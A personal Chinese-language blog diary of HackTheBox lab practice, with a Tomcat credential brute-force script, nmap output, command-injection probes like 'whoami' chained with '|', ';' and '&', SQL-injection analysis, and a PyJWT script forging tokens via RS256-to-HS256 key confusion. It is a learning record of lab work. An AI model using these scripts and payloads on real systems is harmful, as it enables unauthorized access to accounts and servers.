2021/3/21的修行

字数统计: 2.5k字   |   阅读时长≈ 11分

1. 复盘2020/03/20的 HackTheBox Retired 【Jerry】,梳理失误点

1.1 gobuster滥用

实际上应该直接nmap出来是tomcat以后就上去草一下几个常用页面。

我当初的想法 是 很可能已经封了一些 所以直接gobuster看看有几个活着的

现在想想有点想多了

1.2 tomcat猜密码不应该手动,而应该上弱密码库上自动化件直接爆破

1.2.1 爆破脚本

(其实没什么技术含量 就是直接http了……)
但是写这里的话下次可以复(来)用(抄)

1
2
3
4
5
6
7
8
9
10
#!/usr/bin/env python
import sys
import requests
with open('tomcat-betterdefaultpasslist.txt') as f:
for line in f:
c = line.strip('\n').split(":")
r = requests.get('http://10.10.10.95:8080/manager/html', auth=(c[0], c[1]))
if r.status_code == 200:
print "Found valid credentials \"" + line.strip('\n') + "\""
raise sys.exit()

1.2.2 爆破密码库

1.2.2.1 弱密码库SecLists

github地址

Tomcat弱密码rawContentURL

1.3 msf草上去以后,用 错 了!

Meterpreter不是reverse shell,应该用Meterpreter的命令才对啊啊啊啊啊啊!

这就是跳段的代价乡亲们

下面附上Meterpreter的CheatSheat

Meterpreter Cheat Sheet

所以我们其实msf草上去以后就可以了

后面的写jsp那块 这个靶机应该是不要求的

怪不得昨天我觉得怎么htb这 这么不友好 怎么新人上来入门就搞封指令的

23333

我的一个朋友称我为“脑补大师”。好吧 我确实经常想太多就是啦

人格特质如此

2. HackTheBox Challenge 【You know 0xDiablos】 努力了,没打掉

简单搞了下 没思路 主要是 真的不会……

找了个第三方题解

https://gauravsachdev.github.io/2020/08/18/0xDiablos-HTB.html

2.1 二分找缓冲区溢出点

1
python -c "print('A'*184)" | ./vuln

输入字符数量为184的时刚好溢出

2.2 r2

1
r2 ./vuln

emmmmm后面的东西思路我看懂了,但是涉及汇编的东西 太过linux了,我的水平不够开这个坑

强行抄题解可以,但是那没有意义

留着吧,先去修行别的回来再学这个

而且pwn本身实战应用就少不是么

3. 塑形课

今天开了大课

十几个人跑跑跳跳……

稍微 有点过度热闹了

里面并没有任何可以称为同类的存在

明明身处人群 却感到 由衷的孤独感的我

……

不过这种事 我们也早就习惯了 不是么

4. HackTheBox Challenge 【ScriptKiddie】 努力了,没打掉

4.1 发现服务

nmap -v -A -Pn扫出来5000有Werkzeug

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
nmap -v -A -Pn 10.129.95.150
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-21 22:01 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:01
Completed NSE at 22:01, 0.00s elapsed
Initiating NSE at 22:01
Completed NSE at 22:01, 0.00s elapsed
Initiating NSE at 22:01
Completed NSE at 22:01, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 22:01
Completed Parallel DNS resolution of 1 host. at 22:01, 0.01s elapsed
Initiating Connect Scan at 22:01
Scanning 10.129.95.150 [1000 ports]
Discovered open port 22/tcp on 10.129.95.150
Discovered open port 5000/tcp on 10.129.95.150
Increasing send delay for 10.129.95.150 from 0 to 5 due to 25 out of 83 dropped probes since last increase.
Increasing send delay for 10.129.95.150 from 5 to 10 due to max_successful_tryno increase to 4
Increasing send delay for 10.129.95.150 from 10 to 20 due to max_successful_tryno increase to 5
Connect Scan Timing: About 41.76% done; ETC: 22:02 (0:00:43 remaining)
Completed Connect Scan at 22:02, 76.17s elapsed (1000 total ports)
Initiating Service scan at 22:02
Scanning 2 services on 10.129.95.150
Completed Service scan at 22:03, 9.20s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.95.150.
Initiating NSE at 22:03
Completed NSE at 22:03, 9.74s elapsed
Initiating NSE at 22:03
Completed NSE at 22:03, 1.94s elapsed
Initiating NSE at 22:03
Completed NSE at 22:03, 0.00s elapsed
Nmap scan report for 10.129.95.150
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)                                                                                                                                                                                                     
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)                                                                                                                                                                                                   
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 4.8.5)                                                                                                                                                                                                         
| http-methods:                                                                                                                                                                                                                                                     
|_  Supported Methods: OPTIONS GET POST HEAD                                                                                                                                                                                                                        
|_http-title: k1d'5 h4ck3r t00l5                                                                                                                                                                                                                                    
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                    
NSE: Script Post-scanning.                                                                                                                                                                                                                                          
Initiating NSE at 22:03                                                                                                                                                                                                                                             
Completed NSE at 22:03, 0.00s elapsed                                                                                                                                                                                                                               
Initiating NSE at 22:03                                                                                                                                                                                                                                             
Completed NSE at 22:03, 0.00s elapsed                                                                                                                                                                                                                               
Initiating NSE at 22:03                                                                                                                                                                                                                                             
Completed NSE at 22:03, 0.00s elapsed                                                                                                                                                                                                                               
Read data files from: /usr/bin/../share/nmap                                                                                                                                                                                                                        
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                                                                      
Nmap done: 1 IP address (1 host up) scanned in 97.44 seconds

cvedetails找对应版本号的tomcat的cve

4.2 找CVE

https://www.cvedetails.com/vulnerability-list/vendor_id-17201/product_id-41301/Palletsprojects-Werkzeug.html

获得:

1
2
3
CVE-2019-14806
CVE-2019-14322
CVE-2016-10516

但是可以利用版本都比对方机子上的版本低!烦诶!

4.3 gobuster

那 上一个gobuster试试

gobuster dir -u http://10.129.95.150:5000/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

gobuster爆出//TODO

4.4 找CVE

找openSSH的CVE.

8.2p1没找到任何

坏诶!

4.5 考虑是否弱密码

不像

如果弱密码的话,分数不会这样

如果搞了这么多麻烦 结果只是个弱密码 那群基佬早就开骂了对吧

4.6 考虑利用webshell

上面两个栏

无法利用,因为执行shell之前做了IP合法性校验

这tm怎么玩 这没法玩

最下面那个栏

做了特殊字符校验

三个栏只有这个能放非IP过去

只能想办法炸过去了对吧对吧

4.7 摸校验方式

。。。

1
2
3
XenoAmess|whoami
XenoAmess&whoami
XenoAmess;whoami

全部被他校验掉了

1
whoami

过了,

1
1 2

也过了

所以问题不在空格和命令上 应该问题就是在特殊字符校验上

4.8 学学searchsploit

因为本质上他就是在本地开了个searchsploit,
所以如果searchsploit上自己有带一些比较危险的玩具,
或许可以用来草开。

先从-h开始

如果-h能过,说明参数都能用。

1
-h

被校验掉了

淦,黔驴技穷黔驴技穷

认输了认输了

我已经try harder了,俺寻思现在放弃不算丢人

5. HackTheBox Challenge 【Under Construction】 努力了,没打掉

5.1 分析代码

首先显然应该是个nodejs玩意

然后看看DBHelper.js中export出的getUser

看起来这里的sql没有使用模板而是用的裸SQL拼接,看来这里能草

追一下调用链,显然只有这里用到:

1
2
3
4
5
6
7
8
9
10
11
12
router.get('/', AuthMiddleware, async (req, res, next) => {
    try{
        let user = await DBHelper.getUser(req.data.username);
        console.log("XenoAmessPrint : user : " + user);
        if (user === undefined) {
            return res.send(`user ${req.data.username} doesn't exist in our database.`);
        }
        return res.render('index.html', { user });
    }catch (err){
        return next(err);
    }
});

即,我们需要让nodejs接收到req.data.username为一个SQL注入串的请求

5.2 上实例

成功创建个用户,然后回到index去

F12拿到coockie

1
Cookie: session=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwayI6Ii0tLS0tQkVHSU4gUFVCTElDIEtFWS0tLS0tXG5NSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTk1b1RtOUROemNIcjhnTGhqWmFZXG5rdHNiajFLeHhVT296dzB0clA5M0JnSXBYdjZXaXBRUkI1bHFvZlBsVTZGQjk5SmM1UVowNDU5dDczZ2dWRFFpXG5YdUNNSTJob1VmSjFWbWpOZVdDclNyRFVob2tJRlpFdUN1bWVod3d0VU51RXYwZXpDNTRaVGRFQzVZU1RBT3pnXG5qSVdhbHNIai9nYTVaRUR4M0V4dDBNaDVBRXdiQUQ3MytxWFMvdUN2aGZhamdwekhHZDlPZ05RVTYwTE1mMm1IXG4rRnluTnNqTk53bzVuUmU3dFIxMldiMllPQ3h3MnZkYW1PMW4xa2YvU015cFNLS3ZPZ2o1eTBMR2lVM2plWE14XG5WOFdTK1lpWUNVNU9CQW1UY3oydzJrekJoWkZsSDZSSzRtcXVleEpIcmEyM0lHdjVVSjVHVlBFWHBkQ3FLM1RyXG4wd0lEQVFBQlxuLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tXG4iLCJpYXQiOjE2MTYzNDcxNTF9.cIFOqn-mI1R7CW8X8FuIoxFtKDudQcKSfHs1b24z4x3aBZCNfNzRmWGdMHjFkgcxaq6-F1dCawJkA_iPfaHF-T7A6CNz6LPVTWW4psQXumGdJ8K1ChflF-iTaBHDnyDtdW0QaFNETkkhAHPfR1gd1kkvQyJuCLl42g5z2g31jx8N_U6PZT0ITO6WkVfIZopFnsS6uw--5mTqHPWZqP65BfQi-kwOOMIqYeopa6eq2EoWsg3v4O9Zvsz0JPNly-mqUvVCYLewHZmO8N8aD1dCm8f4w8m6jIfCdhYrVJ1Bdi-5cjBN-JxHCkP4oCIZj2prEVoOuKtQspkYK_rbjcR3SQ

看上去eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9很base64,拿着这一段去反解一下base64

得到

1
2
3
4
5
6
{"alg":"RS256","typ":"JWT"}񬉕͕ɹ嵔訉䈰遬計䴴䵉%8ၕ	1%᭕d䴴䵱鵥%	%酹	�᭥圁	E=
Dᅵ%%	
�E䕽Q䥑9鍡ȡ�驅eq魑͉腭ᡕ=�Qɀ䍉�aؙ]偅IձŽ遱Tٙ䥩악hԥМ͝홑E屹aՍ5$ɡ학(ř婹坍ɍɑUὭ%iՍյ塝ݑU9Օ؁婌ԑiQᕌեMQ=靱驥]屍!轝䕩͕ᐁ5Յ݉܌텡L핍١酩큩!ॽ�T؁15艵!q譙幹ͩ99ݼչI䝑Hĉ]艥=
ᜉّ嵼Ÿŭ轍5偍--ٽ�䁱唍镡5ᱹXᝌ�e
Tս	呍艜ɭ鉡i᠙I,ѵŕ塩!Ʉȍ%ؕU(՝YAaQ
Ŭ͑ɱ聝%E	q贴䴵9ၕ	1%᭕d䴴䵱舰饅Ј脘Ę̐܄ԅ􇈔ꧺb5Gֱ花҃锜)'dzV��ݠY׍͙晓왠sꫡut&ঀ?跚_㬎ⷾ뽔֛ꬁ{晒|+Pᾑ~鶁9򎗖ц崄䒐=��dⴲ&˗�=ߘ񰟔趓ЄΩi|樤Y싫໮fNᏙꏫ߂/䀣좦►z턡k ޾��BO6\/T&{٘൴)쿌<먈|'ab剔b󗣄߉İ俊!趦ᕠ늵)Ⴟ�Gt

实锤是base64。

alg应该是algorithm

type应该是type对吧

拿JWT去百度搜索,找找这种格式

https://www.jianshu.com/p/576dbf44b2ae

找到博文一个

了解到JWT信息分为3段,以.分割,并且前两段应该都是base64

所以我们得到的coockie实际是:

1
2
3
1: eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9
2: eyJ1c2VybmFtZSI6ImEiLCJwayI6Ii0tLS0tQkVHSU4gUFVCTElDIEtFWS0tLS0tXG5NSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTk1b1RtOUROemNIcjhnTGhqWmFZXG5rdHNiajFLeHhVT296dzB0clA5M0JnSXBYdjZXaXBRUkI1bHFvZlBsVTZGQjk5SmM1UVowNDU5dDczZ2dWRFFpXG5YdUNNSTJob1VmSjFWbWpOZVdDclNyRFVob2tJRlpFdUN1bWVod3d0VU51RXYwZXpDNTRaVGRFQzVZU1RBT3pnXG5qSVdhbHNIai9nYTVaRUR4M0V4dDBNaDVBRXdiQUQ3MytxWFMvdUN2aGZhamdwekhHZDlPZ05RVTYwTE1mMm1IXG4rRnluTnNqTk53bzVuUmU3dFIxMldiMllPQ3h3MnZkYW1PMW4xa2YvU015cFNLS3ZPZ2o1eTBMR2lVM2plWE14XG5WOFdTK1lpWUNVNU9CQW1UY3oydzJrekJoWkZsSDZSSzRtcXVleEpIcmEyM0lHdjVVSjVHVlBFWHBkQ3FLM1RyXG4wd0lEQVFBQlxuLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tXG4iLCJpYXQiOjE2MTYzNDcxNTF9
3: cIFOqn-mI1R7CW8X8FuIoxFtKDudQcKSfHs1b24z4x3aBZCNfNzRmWGdMHjFkgcxaq6-F1dCawJkA_iPfaHF-T7A6CNz6LPVTWW4psQXumGdJ8K1ChflF-iTaBHDnyDtdW0QaFNETkkhAHPfR1gd1kkvQyJuCLl42g5z2g31jx8N_U6PZT0ITO6WkVfIZopFnsS6uw--5mTqHPWZqP65BfQi-kwOOMIqYeopa6eq2EoWsg3v4O9Zvsz0JPNly-mqUvVCYLewHZmO8N8aD1dCm8f4w8m6jIfCdhYrVJ1Bdi-5cjBN-JxHCkP4oCIZj2prEVoOuKtQspkYK_rbjcR3SQ

前两段解base64得:

1
2
1: {"alg":"RS256","typ":"JWT"}
2: {"username":"a","pk":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA95oTm9DNzcHr8gLhjZaY\nktsbj1KxxUOozw0trP93BgIpXv6WipQRB5lqofPlU6FB99Jc5QZ0459t73ggVDQi\nXuCMI2hoUfJ1VmjNeWCrSrDUhokIFZEuCumehwwtUNuEv0ezC54ZTdEC5YSTAOzg\njIWalsHj/ga5ZEDx3Ext0Mh5AEwbAD73+qXS/uCvhfajgpzHGd9OgNQU60LMf2mH\n+FynNsjNNwo5nRe7tR12Wb2YOCxw2vdamO1n1kf/SMypSKKvOgj5y0LGiU3jeXMx\nV8WS+YiYCU5OBAmTcz2w2kzBhZFlH6RK4mquexJHra23IGv5UJ5GVPEXpdCqK3Tr\n0wIDAQAB\n-----END PUBLIC KEY-----\n","iat":1616347151}

而第三段是 用前两段 以.连接后的结果 进行typ字段方式的加密

我们这里是RS256

所以上个暴力破解轮子草开应该就行了

5.3 草开加密

google 搜索 RS256 hack

直接很多结果

里面甚至有几个特别贴切,教我们怎么黑JWT

https://habr.com/en/post/450054/

https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6

https://trustfoundry.net/jwt-hacking-101/

看了一下,基本思路和我们之前想的不太一样,是这样的

首先 搞到对方的公钥(这个理论上不难)

然后 自己手动把typ的RS256改成HS256,并且自己用对方的公钥去签名,然后最后自己生成个JWT就完事了

唯一的利用需要是,服务端允许支持HS256验证

那么对着源码全局搜索下RS256,发现旁边就并排有个HS256对吧

那这逻辑上就可做了对不对

在线JWT生成工具

pyjwt

5.4 草开加密

代码搞了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import jwt
public = open('key.pem', 'r').read()
print("public key : ")
print(public)
print()
encoded = jwt.encode(
    {
        "username":"a",
        "pk":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA95oTm9DNzcHr8gLhjZaY\\nktsbj1KxxUOozw0trP93BgIpXv6WipQRB5lqofPlU6FB99Jc5QZ0459t73ggVDQi\\nXuCMI2hoUfJ1VmjNeWCrSrDUhokIFZEuCumehwwtUNuEv0ezC54ZTdEC5YSTAOzg\\njIWalsHj/ga5ZEDx3Ext0Mh5AEwbAD73+qXS/uCvhfajgpzHGd9OgNQU60LMf2mH\\n+FynNsjNNwo5nRe7tR12Wb2YOCxw2vdamO1n1kf/SMypSKKvOgj5y0LGiU3jeXMx\\nV8WS+YiYCU5OBAmTcz2w2kzBhZFlH6RK4mquexJHra23IGv5UJ5GVPEXpdCqK3Tr\\n0wIDAQAB\\n-----END PUBLIC KEY-----\\n",
        "iat":1617356081
    },
    key=public,
    algorithm='HS256'
)

print(encoded)

# decoded = jwt.decode(encoded, public, algorithms=['HS256'])
# print(decoded)

不行啊,打不进去。。。对面不管怎么打都是

request
1
2
3
4
5
6
7
8
9
HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 21
ETag: W/"15-+7WyptUlKk9uPTM0Emj6siPHfDA"
Date: Sun, 21 Mar 2021 20:06:25 GMT
Connection: close

Internal server error

吐了。。

5.5 搜到一个别人的轮子

https://github.com/3v4Si0N/RS256-2-HS256

什么啊啊啊一点也不好用!!!

生气!

睡觉了!

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

自称为XenoAmess的方术师。

为了得到【意义】而进行各种各样的修行。

Hack The Box